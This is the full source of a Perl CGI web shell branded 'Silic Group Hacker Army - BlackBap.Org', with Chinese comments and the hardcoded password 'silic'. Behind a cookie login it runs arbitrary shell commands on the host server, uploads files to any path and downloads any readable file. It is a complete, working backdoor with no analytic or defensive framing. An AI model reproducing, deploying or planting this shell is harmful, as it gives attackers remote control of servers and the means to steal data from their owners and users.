#!/usr/bin/perl -I/usr/local/bandmin # 第一行指向正确(大部分不需修改),错误则500,未安装不解析 # 如果是Win服务器,设置$WinNT=1; # 设置本文件属性为755 $Password="silic"; $WinNT=0; $NTCmdSep="&"; $UnixCmdSep=";"; $CommandTimeoutDuration=50; $ShowDynamicOutput=1; $CmdSep=($WinNT ? $NTCmdSep : $UnixCmdSep); $CmdPwd=($WinNT ? "cd" : "pwd"); $PathSep=($WinNT ? "\\" : "/"); $Redirector=($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1"); sub ReadParse{ local(*in)=@_ if @_; local($i,$loc,$key,$val); $MultipartFormData=$ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/; if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};} elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN, $in, $ENV{'CONTENT_LENGTH'});} if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/){ $Boundary='--'.$1; @list=split(/$Boundary/,$in); $HeaderBody=$list[1]; $HeaderBody =~ /\r\n\r\n|\n\n/; $Header=$`; $Body=$'; $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape $in{'filedata'}=$Body; $Header =~ /filename=\"(.+)\"/; $in{'f'}=$1; $in{'f'} =~ s/\"//g; $in{'f'} =~ s/\s//g; for($i=2; $list[$i]; $i++){ $list[$i] =~ s/^.+name=$//; $list[$i] =~ /\"(\w+)\"/; $key=$1; $val=$'; $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g; $val =~ s/%(..)/pack("c", hex($1))/ge; $in{$key}=$val;}} else{ @in=split(/&/, $in); foreach $i (0 .. $#in){ $in[$i] =~ s/\+/ /g; ($key, $val)=split(/=/, $in[$i], 2); $key =~ s/%(..)/pack("c", hex($1))/ge; $val =~ s/%(..)/pack("c", hex($1))/ge; $in{$key} .= "\0" if (defined($in{$key})); $in{$key} .= $val;}} } sub PrintPageHeader{ $EncodedCurrentDir=$CurrentDir; $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; print "Content-type: text/html\n\n"; print < Silic Group Hacker Army - BlackBap.Org $HtmlMetaHeader
 ⊙ $ServerName:$ENV{'SERVER_PORT'} - $ENV{'SERVER_SOFTWARE'} - $ENV{'GATEWAY_INTERFACE'}
  文件上传 | 文件下载 | 注销登录 | power by Silic Group
END } sub PrintLoginScreen{$Message;} sub PrintLoginFailedMessage{print "Login Failed,Wrong Password,Do You Want Try Again... //BlackBap.Org";} sub PrintLoginForm{ print <
Login
PASS:
END } sub PrintPageFooter{print "
";} sub GetCookies{@httpcookies=split(/; /,$ENV{'HTTP_COOKIE'}); foreach $cookie(@httpcookies){($id, $val)=split(/=/, $cookie);$Cookies{$id}=$val;}} sub PrintLogoutScreen{print "Logout Success... //BlackBap.Org

";} sub PerformLogout{ print "Set-Cookie: SAVEDPWD=;\n"; &PrintPageHeader("p"); &PrintLogoutScreen; &PrintLoginScreen; &PrintLoginForm; &PrintPageFooter; } sub PerformLogin { if($LoginPassword eq $Password){ print "Set-Cookie: SAVEDPWD=$LoginPassword;\n"; &PrintPageHeader("c"); &PrintCommandLineInputForm; &PrintPageFooter; }else{ &PrintPageHeader("p"); &PrintLoginScreen; if($LoginPassword ne ""){&PrintLoginFailedMessage;} &PrintLoginForm; &PrintPageFooter; } } sub PrintCommandLineInputForm{ $Prompt=$WinNT ? "$CurrentDir> ":"[Silic\@$ServerName $CurrentDir]\$ "; print <
$Prompt
END } sub PrintFileDownloadForm{ $Prompt=$WinNT ? "$CurrentDir> " : "[r00t\@$ServerName $CurrentDir]\$ "; print <
$Prompt download

Filename:

Download:
END } sub PrintFileUploadForm{ $Prompt=$WinNT ? "$CurrentDir> " : "[r00t\@$ServerName $CurrentDir]\$ "; print <
$Prompt upload

Filename:

Options:   Overwrite if it Exists

Upload:   
END } sub CommandTimeout{ if(!$WinNT){ alarm(0); print < Command exceeded maximum time of $CommandTimeoutDuration second(s).
Killed it! END &PrintCommandLineInputForm; &PrintPageFooter; exit;} } sub ExecuteCommand{ if($RunCommand =~ m/^\s*cd\s+(.+)/){ $OldDir=$CurrentDir; $Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd; chop($CurrentDir=`$Command`); &PrintPageHeader("c"); $Prompt=$WinNT ? "$OldDir> " : "[r00t\@$ServerName $OldDir]\$ "; print "$Prompt $RunCommand"; }else{ &PrintPageHeader("c"); $Prompt=$WinNT ? "$CurrentDir> " : "[r00t\@$ServerName $CurrentDir]\$ "; print "$Prompt $RunCommand"; $Command="cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector; if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);} if($ShowDynamicOutput){ $|=1; $Command .= " |"; open(CommandOutput, $Command); while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";} $|=0; }else{print `$Command`;} if(!$WinNT){alarm(0);} print ""; } &PrintCommandLineInputForm; &PrintPageFooter; } sub PrintDownloadLinkPage{ local($FileUrl)=@_; if(-e $FileUrl){ $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; $DownloadLink="$ScriptLocation?a=download&f=$FileUrl&o=go"; $HtmlMetaHeader=""; &PrintPageHeader("c"); print < Sending File $TransferFile...
If the download does not start automatically, Click Here. END &PrintCommandLineInputForm; &PrintPageFooter; }else{ &PrintPageHeader("f"); print "下载失败 $FileUrl: $!"; &PrintFileDownloadForm; &PrintPageFooter;} } sub SendFileToBrowser{ local($SendFile)=@_; if(open(SENDFILE, $SendFile)) # file opened for reading {if($WinNT){binmode(SENDFILE);binmode(STDOUT);} $FileSize=(stat($SendFile))[7]; ($Filename=$SendFile) =~ m!([^/^\\]*)$!; print "Content-Type: application/x-unknown\n"; print "Content-Length: $FileSize\n"; print "Content-Disposition: attachment; filename=$1\n\n"; print while(); close(SENDFILE); } else{ &PrintPageHeader("f"); print "下载失败 $SendFile: $!"; &PrintFileDownloadForm; &PrintPageFooter; } } sub BeginDownload{ if(($WinNT & ($TransferFile =~ m/^\\|^.:/))|(!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile=$TransferFile;} else{chop($TargetFile) if($TargetFile=$CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;} if($Options eq "go"){&SendFileToBrowser($TargetFile);}else{&PrintDownloadLinkPage($TargetFile);} } sub UploadFile{ if($TransferFile eq ""){&PrintPageHeader("f");&PrintFileUploadForm;&PrintPageFooter;return;} &PrintPageHeader("c"); print "Uploading $TransferFile to $CurrentDir...
"; chop($TargetName) if ($TargetName=$CurrentDir) =~ m/[\\\/]$/; $TransferFile =~ m!([^/^\\]*)$!; $TargetName .= $PathSep.$1; $TargetFileSize=length($in{'filedata'}); if(-e $TargetName && $Options ne "overwrite"){print "Failed:目标文件已存在...
"; }else{ if(open(UPLOADFILE, ">$TargetName")){ binmode(UPLOADFILE) if $WinNT; print UPLOADFILE $in{'filedata'}; close(UPLOADFILE); print "Transfered $TargetFileSize Bytes.
"; print "File Path: $TargetName
"; }else{print "Failed: $!
";} } print ""; &PrintCommandLineInputForm; &PrintPageFooter; } sub DownloadFile{ if($TransferFile eq ""){&PrintPageHeader("f");&PrintFileDownloadForm;&PrintPageFooter;return;} if(($WinNT & ($TransferFile =~ m/^\\|^.:/))|(!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile=$TransferFile;} else{chop($TargetFile) if($TargetFile=$CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;} if($Options eq "go"){&SendFileToBrowser($TargetFile);} else{&PrintDownloadLinkPage($TargetFile);} } &ReadParse; &GetCookies; $ScriptLocation=$ENV{'SCRIPT_NAME'}; $ServerName=$ENV{'SERVER_NAME'}; $LoginPassword=$in{'p'}; $RunCommand=$in{'c'}; $TransferFile=$in{'f'}; $Options=$in{'o'}; $Action=$in{'a'}; $Action="LOGIN" if($Action eq ""); $CurrentDir=$in{'d'}; chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq ""); $LoggedIn=$Cookies{'SAVEDPWD'} eq $Password; if($Action eq "LOGIN" || !$LoggedIn){&PerformLogin;} elsif($Action eq "command"){&ExecuteCommand;} elsif($Action eq "upload"){&UploadFile;} elsif($Action eq "download"){&DownloadFile;} elsif($Action eq "logout"){&PerformLogout;}